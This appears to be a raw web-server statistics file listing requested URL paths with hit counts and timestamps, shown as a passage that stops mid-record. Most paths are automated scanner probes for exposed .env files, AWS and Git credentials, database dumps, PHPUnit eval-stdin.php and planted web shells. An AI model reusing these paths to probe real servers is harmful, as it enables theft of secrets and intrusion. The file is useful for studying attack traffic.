0 0 29340771 0 /wsd.php 1 0 0 0 1 0 0 29343317 0 0 29343317 0 /png.php 1 0 0 0 1 0 0 29126039 0 0 29126039 0 /debug/default/index 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /phpinfo.php.tmp 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /phpinfo.php.orig 1 0 0 0 4 0 0 29387345 0 0 29346262 0 /12.php 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /api/v1/private/env-export 1 0 0 0 2 0 0 29289461 0 0 29287581 0 /old/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /robots.php 1 0 0 0 1 0 0 29415978 0 0 29415978 0 /f-401.php 1 0 0 0 2 0 0 29356483 0 0 29356483 0 /.env.tmp 1 0 0 0 2 0 0 29356484 0 0 29356483 0 /plugins/.env.old 1 0 0 0 1 0 0 29190016 0 0 29190016 0 /.backup 1 1 0 0 7 28802839 0 29415979 28802839 0 29376909 296 /mail.php 1 0 0 0 2 0 0 29387345 0 0 29383262 0 /jga.php 1 0 0 0 4 0 0 29159382 0 0 29060902 0 /media/mediamgr/other/jq_fileupload/server/php/ 1 0 0 0 2 0 0 29356484 0 0 29356483 0 /assets/.env.old 1 0 0 0 2 0 0 29289461 0 0 29287581 0 /.production 1 0 0 0 5 0 0 29387345 0 0 29346262 0 /6.php 1 0 0 0 1 0 0 29220645 0 0 29220645 0 /.github/workflows/aws-publish.yml 1 0 0 0 2 0 0 29289461 0 0 29287581 0 /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 7 0 0 29415979 0 0 29376909 0 /index/function.php 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /backups/app/config.bak 1 0 0 0 11 0 0 29415979 0 0 29285439 0 /ar.php 1 0 0 0 29 0 0 29402830 0 0 28905525 0 /wp1/wp-includes/wlwmanifest.xml 1 0 0 0 3 0 0 29385019 0 0 29344750 0 /filer.php 1 0 0 0 12 0 0 29171690 0 0 29001894 0 /wp 1 0 0 0 1 0 0 29220645 0 0 29220645 0 /.git/logs/HEAD 1 0 0 0 29 0 0 29402830 0 0 28905525 0 /site/wp-includes/wlwmanifest.xml 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /aws-credentials.tmp 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /wp-content/ice.php 1 0 0 0 5 0 0 29387345 0 0 29372583 0 /7h.php 1 0 0 0 4 0 0 29389715 0 0 29346262 0 /witmm.php 1 0 0 0 1 0 0 29340771 0 0 29340771 0 /stealth.php 1 0 0 0 2 0 0 29387345 0 0 29383262 0 /l.php 1 0 0 0 1 0 0 29415979 0 0 29415979 0 /xaz.php 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /n3.php 1 0 0 0 1 0 0 29352213 0 0 29352213 0 /hi.php 1 0 0 0 2 0 0 29356483 0 0 29356483 0 /.env.orig 1 0 0 0 1 0 0 29220645 0 0 29220645 0 /api.js 1 0 0 0 3 0 0 29345798 0 0 29335672 0 /aa21.php 1 0 0 0 13 0 0 29415978 0 0 29365203 0 /wp-admin/wp-conflg.php?p= 1 0 0 0 1 0 0 29220645 0 0 29220645 0 /.gitattributes 1 0 0 0 4 0 0 29389715 0 0 29335553 0 /Okxob.php 1 0 0 0 1 0 0 29335553 0 0 29335553 0 /auth.php 1 0 0 0 2 0 0 29289461 0 0 29287581 0 /administrator/.env 1 0 0 0 2 0 0 29356484 0 0 29356483 0 /core/.env.bak 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /cdn/config.json 1 0 0 0 1 0 0 29352213 0 0 29352213 0 /a7.php 1 0 0 0 13 0 0 29415979 0 0 29335672 0 /file7.php 1 0 0 0 4 0 0 29387345 0 0 29311382 0 /rak.php 1 0 0 0 6 0 0 29415978 0 0 29376909 0 /themes/twentytwentytwo/index.php 1 0 0 0 21 0 0 29415979 0 0 29335672 0 /1.php 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /api/v1/graphql 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /laravel/core/.env 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /config/smtp_credentials.php 1 0 0 0 1 0 0 29352213 0 0 29352213 0 /am.php 1 0 0 0 1 0 0 28770895 0 0 28770895 0 /files/ 1 0 0 0 1 0 0 29335553 0 0 29335553 0 /wp-load.php 1 0 0 0 21 0 0 28821023 0 0 28727585 0 /?104.166.80.49 1 0 0 0 5 0 0 29171690 0 0 29001894 0 /test 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /aws_secrets_bak.json 1 0 0 0 2 0 0 29289461 0 0 29287581 0 /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 1 0 0 28680699 0 0 28680699 0 /backend/.git/config 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /aws.js 1 0 0 0 3 0 0 29381255 0 0 29340771 0 /file.php 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /info.php.backup 1 0 0 0 3 0 0 29415978 0 0 29335553 0 /g.php 1 0 0 0 1 0 0 29379197 0 0 29379197 0 /end.php 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /swagger.js 1 0 0 0 5 0 0 29415978 0 0 29395728 0 /fv.php 1 0 0 0 1 0 0 29379198 0 0 29379198 0 /0%25.php 1 0 0 0 12 0 0 29389715 0 0 29335672 0 /gm.php 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /backend/config/development.yml 1 0 0 0 1 0 0 29378467 0 0 29378467 0 /wp-2019.php? 1 0 0 0 2 0 0 28730052 0 0 28642266 0 /static/admin/javascript/hetong.js 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /controller/admin/post.js 1 0 0 0 1 0 0 29378467 0 0 29378467 0 /web/wp-login.php 1 0 0 0 1 0 0 29344750 0 0 29344750 0 /mm.php 1 0 0 0 24 0 0 29415978 0 0 29335672 0 /lv.php 1 0 0 0 2 0 0 29364908 0 0 29346543 0 /webjars/swagger-ui/ 1 0 0 0 1 0 0 29400764 0 0 29400764 0 /01.php 1 0 0 0 3 0 0 28709248 0 0 28681764 0 /favicon.ico?195.211.77.140 1 0 0 0 1 0 0 29388817 0 0 29388817 0 /php_errors.log 1 0 0 0 7 0 0 29415979 0 0 29376909 0 /wp-includes/assets/index.php 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /cgi-bin/info.php 1 0 0 0 13 0 0 29381255 0 0 29335672 0 /a2.php 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /phpinfo.php~ 1 0 0 0 15 0 0 29387345 0 0 29335553 0 /file2.php 1 1 0 0 0 28641367 0 0 28641367 0 0 322 /_autoindex/assets/js/tablesort.number.js 1 0 0 0 1 0 0 29376909 0 0 29376909 0 /ini.php 1 0 0 0 24 0 0 29179785 0 0 28886528 0 /ads.txt 1 0 0 0 11 0 0 29388817 0 0 29172736 0 /test.php 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /wp-gif.php 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /rex.php 1 0 0 0 5 0 0 28770899 0 0 28770898 0 /autant 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /db_dumps/ 1 0 0 0 4 0 0 29415978 0 0 29379198 0 /xv.php 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /xampp/.env 1 0 0 0 1 0 0 29190016 0 0 29190016 0 /docker-compose.dev.yml 1 0 0 0 11 0 0 29364908 0 0 28641362 0 /server-status 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /ccx/th3_err0r.php 1 0 0 0 1 0 0 29379197 0 0 29379197 0 /zeal.php 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /sms.py 1 0 0 0 3 0 0 29388817 0 0 29232451 0 /tool/view/phpinfo.view.php 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /class5.php 1 0 0 0 1 0 0 29378466 0 0 29378466 0 /wp-includes/fonts/index.php 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /wp-includes/css/modules.php 1 0 0 0 19 0 0 29389628 0 0 28994986 0 /news/wp-includes/wlwmanifest.xml 1 0 0 0 5 0 0 29415979 0 0 29395728 0 /ww1.php 1 0 0 0 2 0 0 29381255 0 0 29346261 0 /ova.php 1 0 0 0 1 0 0 29220645 0 0 29220645 0 /.vscode/launch-aws.json 1 0 0 0 2 0 0 29159381 0 0 29126038 0 /asset/kcfinder/upload.php 1 0 0 0 5 0 0 29171690 0 0 29001894 0 /temp 1 0 0 0 1 0 0 29098866 0 0 29098866 0 /.vscode/sftp.json?164.92.77.30 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /exports/.env 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /tmp/info.php 1 4 0 0 0 28992843 0 0 28992843 0 0 348 /.well-known/acme-challenge/xGyTXj3BlAdctAHx25TfaBINEvuqEz4DBbOURD_DEmo 1 0 0 0 2 0 0 29387345 0 0 29383262 0 /sh.php 1 0 0 0 11 0 0 29364908 0 0 28641362 0 /telescope/requests 1 0 0 0 2 0 0 29389715 0 0 29379197 0 /wp-is.php 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /wp-content/small.php 1 0 0 0 1 0 0 29220645 0 0 29220645 0 /.idea/aws_smtp.xml 1 0 0 0 2 0 0 29345798 0 0 29335672 0 /anan.php 1 0 0 0 2 0 0 29415979 0 0 29343317 0 /ac.php 1 0 0 0 8 0 0 29385019 0 0 29335672 0 /f6.php 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /php_info.php.swp 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /pws.php 1 0 0 0 9 0 0 29381149 0 0 29335672 0 /NewFile.php 1 0 0 0 1 0 0 29126039 0 0 29126039 0 /node_modules/jquery.filer/php/readme.txt 1 0 0 0 2 0 0 29356484 0 0 29356483 0 /api/.env.old 1 0 0 0 2 0 0 29289461 0 0 29287581 0 /lib/phpunit/phpunit/Util/PHP/eval-stdin.php 1 0 0 0 6 0 0 29415979 0 0 29376909 0 /wp-includes/ID3/about.php 1 0 0 0 1 0 0 28770918 0 0 28770918 0 /i/phpinfo.php 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /php_info.php.tmp 1 0 0 0 2 0 0 29289461 0 0 29287581 0 /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 3 0 0 29387345 0 0 29343317 0 /bb5.php 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /phpinfo.php.backup 1 0 0 0 2 0 0 29356483 0 0 29356483 0 /.env~ 1 0 0 0 1 0 0 29388817 0 0 29388817 0 /access.log 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /wp-content/iu.php 1 0 0 0 2 0 0 29340771 0 0 29335553 0 /himu.php 1 0 0 0 12 0 0 29364908 0 0 28641362 0 /debug/default/view?panel=config 1 0 0 0 2 0 0 29289461 0 0 29287581 0 /core/app/.env 1 0 0 0 1 0 0 29381255 0 0 29381255 0 /ll.php 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /node_modules/.env 1 0 0 0 19 0 0 29388817 0 0 28770893 0 /phpinfo.php 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /env/.env 1 0 0 0 4 0 0 29404800 0 0 29395728 0 /w1w.php 1 1 0 0 0 29080864 0 0 29080864 0 0 64 /.well-known/acme-challenge/17AZ826Q90ZZA1NIOVCUOUCKRQD-F2IN 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /aws.yml 1 0 0 0 1 0 0 29343317 0 0 29343317 0 /tes.php 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /backend/config/default.yml 1 0 0 0 1 0 0 29404800 0 0 29404800 0 /g6sshell.php 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /docker-compose.staging.yml 1 0 0 0 1 0 0 29126039 0 0 29126039 0 /node_modules/jquery-filer/php/readme.txt 1 0 0 0 3 0 0 29289461 0 0 29175678 0 /laravel/.env 1 0 0 0 2 0 0 29352213 0 0 29346262 0 /f1.php 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /f0x.php 1 0 0 0 29 0 0 29402830 0 0 28905525 0 /shop/wp-includes/wlwmanifest.xml 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /wp-asd.php 1 0 0 0 2 0 0 29387345 0 0 29383262 0 /xl.php 1 0 0 0 1 0 0 29415979 0 0 29415979 0 /1aa.php 1 0 0 0 1 0 0 29335553 0 0 29335553 0 /sts.php 1 0 0 0 1 0 0 29379197 0 0 29379197 0 /1wx.php 1 0 0 0 2 0 0 29190016 0 0 29175678 0 /.aws/config 1 0 0 0 1 0 0 29352213 0 0 29352213 0 /X.php 1 0 0 0 1 0 0 29376908 0 0 29376908 0 /modules/mod_simplefileuploadv1.3/elements/filemanager.php?p= 1 0 0 0 2 0 0 29387345 0 0 29383262 0 /wp-content/themes/pridmag/db.php?u 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /wio.php 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /assets/js/*.js 1 0 0 0 2 0 0 29388817 0 0 29220646 0 /config/database.yml 1 0 0 0 19 0 0 29389628 0 0 28994986 0 /wp2/wp-includes/wlwmanifest.xml 1 0 0 0 10 0 0 29400764 0 0 29311382 0 /bless2.php 1 0 0 0 2 0 0 29159382 0 0 29126038 0 /tinymce/plugins/filemanager/dialog.php 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /info.php.orig 1 0 0 0 3 0 0 29345798 0 0 29335672 0 /ckk.php 1 0 0 0 5 0 0 29415978 0 0 29395728 0 /admin.php?p= 1 0 0 0 2 0 0 29346261 0 0 29343317 0 /xex.php 1 0 0 0 5 0 0 29404800 0 0 29376909 0 /moon.php?p= 1 0 0 0 2 0 0 29356484 0 0 29356483 0 /config/.env.bak 1 0 0 0 4 0 0 29159382 0 0 29060902 0 /js/jquery-file-upload/server/php/ 1 0 0 0 3 0 0 29352213 0 0 29335553 0 /tgrs.php 1 0 0 0 2 0 0 29289461 0 0 29287581 0 /lab/.env 1 0 0 0 1 0 0 29220647 0 0 29220647 0 /internal/api/keys 1 0 0 0 3 0 0 29397689 0 0 29376909 0 /wp-content/plugins/pwnd/as.php 1 0 0 0 3 0 0 29364908 0 0 29220645 0 /api/graphql 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /admin/controllers/partner.js 1 0 0 0 3 0 0 29177642 0 0 29171395 0 http://www.admin.imators.com/.env 1 0 0 0 6 0 0 29389715 0 0 29354786 0 /mah.php 1 0 0 0 4 0 0 29364908 0 0 28992845 0 /actuator/env 1 0 0 0 1 0 0 29190016 0 0 29190016 0 /backup.tar.gz 1 0 0 0 2 0 0 29289461 0 0 29287581 0 /.local 1 0 0 0 2 0 0 29346261 0 0 29335553 0 /ftp.php 1 0 0 0 1 0 0 29379197 0 0 29379197 0 /rei.php 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /docker/.env 1 0 0 0 6 0 0 29415979 0 0 29376909 0 /css/colors/blue/index.php 1 0 0 0 12 0 0 29389715 0 0 29285439 0 /wp.php 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /database.tmp 1 0 0 0 1 0 0 29352213 0 0 29352213 0 /S.php 1 0 0 0 2 0 0 29356484 0 0 29356483 0 /config/.env.save 1 0 0 0 3 0 0 28770919 0 0 28770918 0 /i/ 1 0 0 0 12 0 0 29415978 0 0 29340771 0 /wp-content/plugins/hellopress/wp_filemanager.php?3.17.57.190 1 0 0 0 1 0 0 29388817 0 0 29388817 0 /logs/error.log 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /api/upload 1 0 0 0 2 0 0 29387345 0 0 29383262 0 /fb.php 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /zex.php 1 0 0 0 2 0 0 29385019 0 0 29383909 0 /gorila.php 1 0 0 0 3 0 0 29379198 0 0 29335672 0 /keu.php 1 0 0 0 2 0 0 29389715 0 0 29379198 0 /yanki.php 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /i3wfj.php 1 0 0 0 2 0 0 29388817 0 0 29356484 0 /dev/phpinfo.php 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /admin/server_info.php 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /info.php.old 1 0 0 0 11 0 0 29364908 0 0 28641362 0 /.vscode/sftp.json 1 0 0 0 3 0 0 29381150 0 0 29372583 0 /f2r4.php 1 0 0 0 4 0 0 29387345 0 0 29346262 0 /kk.php 1 0 0 0 1 0 0 28770897 0 0 28770897 0 /admin.html 1 0 0 0 2 0 0 29364908 0 0 29346543 0 /graphql 1 1 0 0 0 28729322 0 0 28729322 0 0 64 /.well-known/acme-challenge/EAFJF94DA9YX1CE75W0_ZU18VS-APQDX 1 0 0 0 2 0 0 29387345 0 0 29383263 0 /wsr2.php 1 0 0 0 1 0 0 29379197 0 0 29379197 0 /pt.php 1 0 0 0 3 0 0 29387345 0 0 29311382 0 /aaaa.php 1 0 0 0 5 0 0 29389715 0 0 29335672 0 /akcc.php 1 0 0 0 1 0 0 29379197 0 0 29379197 0 /888.php 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /scripts/info.php.save 1 0 0 0 2 0 0 29404800 0 0 29400764 0 /waw.php 1 0 0 0 1 0 0 29343317 0 0 29343317 0 /eifjp.php 1 0 0 0 2 0 0 29345798 0 0 29335672 0 /ddgg.php 1 0 0 0 2 0 0 29387345 0 0 29383262 0 /bluejackets.php 1 0 0 0 5 0 0 29404800 0 0 29376908 0 /termps.php 1 0 0 0 2 0 0 29364908 0 0 29346543 0 /v3/api-docs 1 0 0 0 2 0 0 29345798 0 0 29335672 0 /wk.php 1 0 0 0 2 0 0 29387345 0 0 29383262 0 /wteed.php 1 0 0 0 2 0 0 29415979 0 0 29404800 0 /security.php 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /cgi-bin/wp-2019.php 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /www/phpinfo.php 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /exports/dbdump.sql 1 0 0 0 2 0 0 29345798 0 0 29335672 0 /lol.php 1 0 0 0 3 0 0 29389715 0 0 29383262 0 /Sanskrit.php 1 0 0 0 1 0 0 29352213 0 0 29352213 0 /N.php 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /scripts/phpinfo.php 1 0 0 0 2 0 0 29387345 0 0 29383263 0 /ef.php 1 0 0 0 2 0 0 29289461 0 0 29287581 0 /phpunit/Util/PHP/eval-stdin.php 1 0 0 0 1 0 0 28680699 0 0 28680699 0 /home/.git/config 1 0 0 0 1 0 0 29228729 0 0 29228729 0 /moddofuns.php 1 0 0 0 2 0 0 29289461 0 0 29287581 0 /protected/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 1 0 0 29190016 0 0 29190016 0 /database.sql 1 0 0 0 1 0 0 29378466 0 0 29378466 0 /wp-content/plugins/edaewni/index.php 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /api/private/credentials 1 0 0 0 1 0 0 29220648 0 0 29220648 0 /private/api/credentials 1 0 0 0 3 0 0 29400763 0 0 29395728 0 /hob.php 1 0 0 0 31 0 0 29402830 0 0 28905524 0 /web/wp-includes/wlwmanifest.xml 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /miso.php 1 0 0 0 1 0 0 29379197 0 0 29379197 0 /alfa-rex.php7 1 0 0 0 1 0 0 29220648 0 0 29220648 0 /kubernetes/config 1 0 0 0 1 0 0 29379197 0 0 29379197 0 /Jcrop.php 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /awsconfig.js 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /config/sendgrid.env 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /new/.env.staging 1 0 0 0 2 0 0 29338965 0 0 29248453 0 /wp-admin/install.php?step=1 1 0 0 0 4 0 0 29370559 0 0 29340771 0 /wlex.php 1 0 0 0 11 0 0 29415979 0 0 29365203 0 /wp-admin/about.php 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /w0.php 1 0 0 0 1 0 0 29352213 0 0 29352213 0 /v9.php 1 0 0 0 5 0 0 29397689 0 0 29346261 0 /fm.php?p= 1 0 0 0 5 0 0 29404800 0 0 29361975 0 /bge.php 1 0 0 0 7 0 0 29381149 0 0 29340771 0 /33.php 1 0 0 0 2 0 0 29385019 0 0 29383909 0 /sh3ll.php 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /snd.php 1 0 0 0 3 0 0 29381150 0 0 29372583 0 /l10n.php 1 0 0 0 1 0 0 29378467 0 0 29378467 0 /filename.php 1 0 0 0 6 0 0 29356483 0 0 29175678 0 /admin/.env 1 0 0 0 10 0 0 29415979 0 0 29370559 0 /wp-admin/js/index.php 1 0 0 0 5 0 0 29381149 0 0 29365203 0 /fso.php 1 0 0 0 1 0 0 29346262 0 0 29346262 0 /d4.php 1 0 0 0 2 0 0 29356484 0 0 29356483 0 /includes/.env 1 0 0 0 4 0 0 29388817 0 0 29220645 0 /.env.backup 1 0 0 0 2 0 0 29345798 0 0 29335672 0 /wf.php 1 0 0 0 1 0 0 29415979 0 0 29415979 0 /ave.php 1 0 0 0 9 0 0 29415979 0 0 29370559 0 /wp-freya.php 1 0 0 0 1 0 0 29352213 0 0 29352213 0 /log.php 1 0 0 0 1 0 0 29378467 0 0 29378467 0 /wp-content/about.php 1 0 0 0 1 0 0 29352213 0 0 29352213 0 /I.php 1 0 0 0 17 0 0 29400763 0 0 29335672 0 /atomlib.php 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /dev/phpinfo.php.save 1 2 2 0 9 28641362 0 29364908 28641362 0 28729323 1302 /?rest_route=/wp/v2/users/ 1 0 0 0 1 0 0 29335553 0 0 29335553 0 /cs.php 1 0 0 0 1 0 0 29372583 0 0 29372583 0 /zen.php 1 0 0 0 11 0 0 29402830 0 0 28905524 0 /feed/ 1 0 0 0 2 0 0 29388817 0 0 29356484 0 /test/phpinfo.php 1 0 0 0 3 0 0 29389715 0 0 29335553 0 /shoha.php 1 0 0 0 7 0 0 29385019 0 0 29365203 0 /afile.php 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /991176.php 1 0 0 0 15 0 0 29415978 0 0 29285439 0 /class20.php 1 0 0 0 7 0 0 29415978 0 0 29335672 0 /class19.php 1 0 0 0 2 0 0 29289461 0 0 29287581 0 /wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 2 0 0 29379198 0 0 29340771 0 /vast.php 1 0 0 0 4 0 0 29387345 0 0 29220651 0 /upload.php 1 0 0 0 1 0 0 29220648 0 0 29220648 0 /remote.php 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /api/config.js 1 0 0 0 5 0 0 29171689 0 0 29001894 0 /admin 1 0 0 0 6 0 0 29415979 0 0 29376909 0 /plugins/Cache/footer.php 1 0 0 0 1 0 0 29335553 0 0 29335553 0 /test2.php 1 0 0 0 3 0 0 29397689 0 0 29376909 0 /wp-includes/certificates/plugins.php 1 0 0 0 1 0 0 29404800 0 0 29404800 0 /Sh3ll.php 1 0 0 0 1 0 0 29378466 0 0 29378466 0 /.well-known/acme-challenge/LA.php 1 0 0 0 1 0 0 29370559 0 0 29370559 0 /18299.php 1 0 0 0 1 0 0 29378466 0 0 29378466 0 /qa.php 1 0 0 0 4 0 0 29352213 0 0 29335553 0 /v4.php 1 0 0 0 4 0 0 29159383 0 0 28936062 0 /vendor/laravel-filemanager/js/script.js 1 0 0 0 1 0 0 29388817 0 0 29388817 0 /terraform.tfvars 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /test.php.swp 1 0 0 0 2 0 0 29190016 0 0 29175678 0 /backend/.env 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /lib.php 1 0 0 0 6 0 0 29385019 0 0 29370559 0 /X7x.php 1 0 0 0 3 0 0 28770897 0 0 28770893 0 /readme.md 1 0 0 0 4 0 0 29356484 0 0 29287581 0 /lib/.env 1 0 0 0 1 0 0 29071308 0 0 29071308 0 /installer.php?164.92.77.30 1 0 0 0 7 0 0 29415979 0 0 29376909 0 /admin/function.php 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /wp-admin/codeboy1877_up.php 1 1 0 0 0 29258704 0 0 29258704 0 0 87 /.well-known/acme-challenge/Yur7a2RP7qQdGvmERDD4Z5LGusUzQfwIK49duKFPpYg?3.17.57.190 1 0 0 0 10 0 0 29385019 0 0 29335672 0 /wa.php 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /test.php.tmp 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /site/info.php.save 1 0 0 0 1 0 0 29352213 0 0 29352213 0 /D.php 1 0 0 0 11 0 0 29415979 0 0 29365203 0 /wp-trackback.php 1 0 0 0 5 0 0 29387345 0 0 29346262 0 /bypass.php 1 0 0 0 1 0 0 29220645 0 0 29220645 0 /.expo-shared/assets.json 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /cgi-bin/ffAA531.php 1 0 0 0 1 0 0 28680699 0 0 28680699 0 /wp-content/.git/config 1 0 0 0 6 0 0 29415978 0 0 29376908 0 /wp-admin/network/wp-conflg.php?p= 1 0 0 0 1 0 0 29220645 0 0 29220645 0 /.docker/config.json 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /tonant.php 1 0 0 0 2 0 0 29289461 0 0 29287581 0 /.remote 1 0 0 0 3 0 0 29387345 0 0 29335553 0 /z.php 1 0 0 0 2 0 0 28697867 0 0 28687280 0 /robots.txt?195.211.77.140 1 0 0 0 7 0 0 29415979 0 0 29335553 0 /php.php 1 0 0 0 2 0 0 29345798 0 0 29335672 0 /0x0x.php 1 0 0 0 6 0 0 29415979 0 0 29376909 0 /wp-content/plugins/admin.php 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /an7.php 1 0 0 0 1 0 0 29379198 0 0 29379198 0 /2%25.php 1 0 0 0 3 0 0 29385019 0 0 29344750 0 /opts.php 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /5fesj.php 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /server/config/database.js 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /backup/env-production.tar.gz 1 0 0 0 1 0 0 29145055 0 0 29145055 0 /wordpress/wp-includes/wlwmanifest.xml?3.17.57.190 1 0 0 0 1 0 0 29220648 0 0 29220648 0 /k8s/config.yaml 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /main/.env 1 0 0 0 11 0 0 29402830 0 0 28905524 0 /wp-includes/ID3/license.txt 1 1 0 0 0 28992843 0 0 28992843 0 0 87 /.well-known/acme-challenge/xGyTXj3BlAdctAHx25TfaBINEvuqEz4DBbOURD_DEmo?164.92.77.30 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /priv8.php 1 0 0 0 3 0 0 29363933 0 0 29353673 0 /manager/assets/modext/core/modx.js 1 0 0 0 5 0 0 29363938 0 0 29353656 0 /manager/media/script/mootools/mootools.js 1 0 0 0 1 0 0 29379197 0 0 29379197 0 /666.php 1 0 0 0 2 0 0 29220645 0 0 29175678 0 /admin/config 1 0 0 0 1 0 0 29379197 0 0 29379197 0 /block-bindings.php 1 0 0 0 2 0 0 29356484 0 0 29356483 0 /lib/.env.old 1 0 0 0 2 0 0 29356484 0 0 29356483 0 /application/.env.save 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /date.php 1 0 0 0 13 0 0 29385019 0 0 29335672 0 /usep.php 1 0 0 0 1 0 0 29388817 0 0 29388817 0 /local_settings.py 1 0 0 0 1 0 0 29361975 0 0 29361975 0 /crypted.php 1 0 0 0 1 0 0 29208069 0 0 29208069 0 /env 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /my_env/newsletter.py 1 0 0 0 1 0 0 29220646 0 0 29220646 0 /file-upload.php 1 0 0 0 7 0 0 29381149 0 0 29340771 0 /lala.php 1 0 0 0 2 0 0 29372537 0 0 29372534 0 /profile.php 1 0 0 0 1 0 0 29190016 0 0 29190016 0 /backup.zip 1 0 0 0 3 0 0 29381255 0 0 29346262 0 /qing.php 1 0 0 0 1 0 0 29175678 0 0 29175678 0 /debug/default/view 1 0 0 0 7 0 0 29171690 0 0 29001894 0 /blog 1 0 0 0 2 0 0 29220647 0 0 29175678 0 /index.js 1 2 0 0 0 28802840 0 0 28802839 0 0 731 /invoice.php 1 0 0 0 1 0 0 29220649 0 0 29220649 0 /staging/.env 1 0 0 0 6 0 0 29381149 0 0 29340771 0 /haikh.php 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /csv.php 1 1 0 0 0 28641367 0 0 28641367 0 0 333 /_autoindex/assets/icons/folder-fill.svg 1 0 0 0 7 0 0 29379198 0 0 29335672 0 /cccc.php 1 0 0 0 4 0 0 29159382 0 0 29060902 0 /assets/global/plugins/jquery-file-upload/server/php/ 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /twso.php 1 0 0 0 1 0 0 29220645 0 0 29220645 0 /.github/workflows/deploy.yml 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /phpinfo.php.save 1 0 0 0 1 0 0 29376908 0 0 29376908 0 /up.php?x= 1 0 0 0 3 0 0 29400763 0 0 29395728 0 /wp-includes/cs.php 1 0 0 0 12 0 0 29385019 0 0 29335672 0 /wfile.php 1 0 0 0 1 0 0 29389715 0 0 29389715 0 /abc.php 1 0 0 0 1 0 0 29344750 0 0 29344750 0 /apit.php 1 0 0 0 2 0 0 29387345 0 0 29383263 0 /zr.php 1 0 0 0 1 0 0 29356484 0 0 29356484 0 /serverinfo.php 1 0 0 0 1 0 0 29343317 0 0 29343317 0 /ccaef.php 1 0 0 0 1 0 0 29352213 0 0 29352213 0 /.well-known/acme-challenge/admin.php 1 0 0 0 6 0 0 29389715 0 0 